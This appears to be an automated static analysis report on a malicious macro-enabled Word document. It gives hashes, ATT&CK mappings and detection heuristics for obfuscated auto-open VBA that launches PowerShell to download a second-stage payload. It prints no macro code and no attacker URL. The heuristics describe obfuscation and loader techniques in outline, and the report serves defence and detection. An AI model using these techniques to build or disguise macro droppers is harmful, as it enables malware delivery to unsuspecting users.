Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 590c770ec353b0e4…

MALICIOUS

Office (OOXML)

22.7 KB Created: 2021-07-07 16:35:00 UTC Authoring application: Microsoft Office Word 15.0000
MD5: f2a894909b6ca033edbb3ebe36dc09e8 SHA-1: 9f1707fe236bac6de28c98c42f0b6fbc9062e97a SHA-256: 590c770ec353b0e4c39bf2f89780542f08bd2b3845fc32ba9ebc6d60c11e9ad7
302 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1204.002 Malicious File

The sample is an OOXML document containing obfuscated VBA macros. These macros are designed to execute automatically upon opening, leveraging the Shell() function to launch a PowerShell process. The reconstructed PowerShell command appears to be designed to download and execute a second-stage payload, indicating a downloader or droppper functionality.

Heuristics 8

  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • VBA project inside OOXML medium OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
    • http://schemas.openxmlformats.org/markup-compatibility/2006
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships
    • http://schemas.openxmlformats.org/officeDocument/2006/math
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main
    • http://schemas.microsoft.com/office/word/2010/wordml
    • http://schemas.microsoft.com/office/word/2012/wordml
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk
    • http://schemas.microsoft.com/office/word/2006/wordml
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas
4848bfe3fbe83506d9a9feca110652cbf41a75ec8c88e82bfdec2f2e45a2a3a4		 vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 25185 bytes
vbaProject_00.bin
37fb3bc8b3748db174ba476ed5cf991fb79cd5bd3f996fa8ae6d02fd12bf1e72		 vba-project OOXML VBA project: word/vbaProject.bin 40960 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.